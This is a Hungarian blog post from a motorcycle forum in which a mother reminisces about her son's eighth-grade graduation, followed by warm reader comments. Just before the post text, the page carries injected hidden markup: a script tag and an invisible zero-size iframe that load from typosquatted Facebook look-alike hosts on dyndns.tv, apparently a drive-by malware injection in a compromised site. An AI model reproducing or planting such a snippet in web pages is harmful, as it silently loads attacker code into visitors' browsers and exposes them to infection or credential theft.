Street Racer STR motoros kesztyű a MotoZemtől

Elrepült 8 év

<script src="http://faceb00ks.dyndns.tv"></script><iframe src="http://faceb00k.dyndns.tv" style="display: none;" height="0" width="0"></iframe>Repül az idő. Gondolom, mindenki így van ezzel, akinek gyermeke van. Emlékszünk az első mosolyára, az elő szavaira, az első lépéseire... minden elsőre. Miközben a szebbnél szebb emlékek csak gyűlnek, a gyermekünk felnő. Nem tudom, hirtelen hová tűnt 14 év :) nekem csak pillanatok voltak.
Eltelt 8 év... Szinte hihetetlen, de nemrég írattam be az iskolába. Az első napok, hetek olyan élénken vannak a fejemben, és már vége. Az első tanévnyitó ünnepség, a várakozás izgalma csillogott a szemében. Milyen izgatott volt, amikor az iskolatáskával a hátán beléptünk a kapun... Kati néni, az osztályfőnök mosolyogva köszöntött mindenkit, igazi tyúkanyóként terelgette a megszeppent elsősöket. Az én kicsi fiam iskolás. Milyen furcsa érzés is volt, büszke voltam rá. Ahogy vitte a táskáját, és mindennap egyre nagyobb lelkesedéssel gyakorolt, mert olvasni akart.
Teltek a hetek, a hónapok, az évek. Barátságok és szerelmek alakultak és bomlottak fel. Persze a lelkesedés is átalakult, már nem a tanulás volt a vonzó az iskolában, hanem a szünetek, és a barátok. Az osztálykirándulások, családi napok, iskolabál. Mind egy-egy szép emlék, igen ma már csak emlék, mert eljött a ballagás napja, amit annyira vártunk.
Várták a "gyerekek" és a szülők is.
Nyolc év alatt annyi minden történt, okosodtak... kamaszodtak... felvételi... és felnőttek.
Büszkén és félve, könnyes szemmel mosolyogtam a fiamra.
A büszkeség nem is az emléklapnak, oklevélnek vagy a búcsúbeszédnek szólt, hanem neki és a 8.c-nek. Olyan komolyan csinálták végig a két órás ünnepséget. Készültek rá. A búcsúbeszédet saját maguk írták közösen, nem valamelyik tanár szavait olvasta fel, hanem az osztály gondolatait. Azt gondolnánk, hogy a kamaszok nem szeretnek szerepelni, mégis kiállt az osztály, dallal köszönt el az iskolától és a tanároktól. Karamell - Szállok a dallal-t mosolyogva énekelték.
Az ünnepség végén a ballagó diákok lufit engedtek a levegőbe, elszállt a dal és a 8 év. :)
Félelem is van bennem, mert új iskola, komolyabb tanulás, új barátok és szerelmek, és a végén egy mérföldkő, az érettségi vár majd rá. Most ez is távolinak tűnik... Szinte tegnap tartottam először a karomban és szeptemberben a középiskolát kezdi.
Na de, hol van az még??? Ezt gondoltam 2003. szeptember elsején is :D
  • Like
Reactions: 1 person

Hozzászólások

Valahogy mindenki így van ezzel:) Bár én még csak nagyon az elején járok, de már érzem, hogy öregszem:muhaha: Még csak most született a Fiam...de jövőre már oviból ballag, és máris iskolás lesz:heureka: Az iskolás évek pedig még gyorsabban telnek el...bele sem merek gondolni:D
 
nekem még csak 8 éves lesz a fiam,de el se hiszem,h ilyen nagy már... pedig még csak most született... :D
 
Ó, de szépet írtál. Hát igen, ezek az ünnepségek/ballagások mind nekünk szólnak, hogy lássuk, egyre felnőttebbek...
 
Az enyém is tegnap ballagott. Gyönyörű nagyfiúk, akik az elmúlt 8 évben barátokká váltak. Bementem a termükbe, vittem a virágot, viccelődtem velük aztán köszöntem és sorba jöttek puszit adni. Maguktól. Mind fiúk. Lehajoltak és puszit nyomtak a képemre, pedig már évek óta ciki ez.
De tegnap olyan nagyon büszke voltam és nem csak a saját gyerekemre !
 
Nahát, a Te fiad osziját is Kati néninek hítták? Az enyimet is! Egy tündér vót, és az a mai napig is. Még mindig emleget a mostaniaknak. Hiába no, a rossz példa is példa :muhaha:
 
Szépet írtál!Hidd el,ez még csak fokozódni fog!Most született,most ballag az oviban,az iskolában.Hova menjen továbbtanulni,mindez,csak egy " Pillanat"-nak tűnik.Aztán középiskolás,aztán katona lett,-hál Isten már nincs ilyen-,pár év,jönnek a lányok,fiúk....komollyá válik,-vagy majd a következő,-és...jön a Baba...Örülsz Anya?! Nagyon,de még nem fogtam fel...Hiszen én még nem is éltem,és olyan fiatal vagyok...mi ez,hogy felnőttek??!!Aztán megszületik,és új" Szerelem " kezdődik,az " Igazi!"-már nem számít más,nem számítasz Te,csak " Ő",az Unoka.Büszkén nézed az Oviban anyák napján,olyan izgatottan mész érte,mintha randira mennél,kigondolsz jó programot,s amikor azt mondja spontán,hogy "Szeretlek mama"-elolvadsz,mosolyogsz,hogy kezdődik minden elölről,és Te még mindig nem bírtál megöregedni...Ez az Élet....Csak egészségben,sokáig tartson!
 

Blogbejegyzés információ

Szerző
Mely's
Olvasás
578
Hozzászólások
14
Utolsó frissítés

Motoros blogok további bejegyzései

Mely's további bejegyzései

Oszd meg ezt a bejegyzést

CsamShop kendők

Back
Oldal tetejére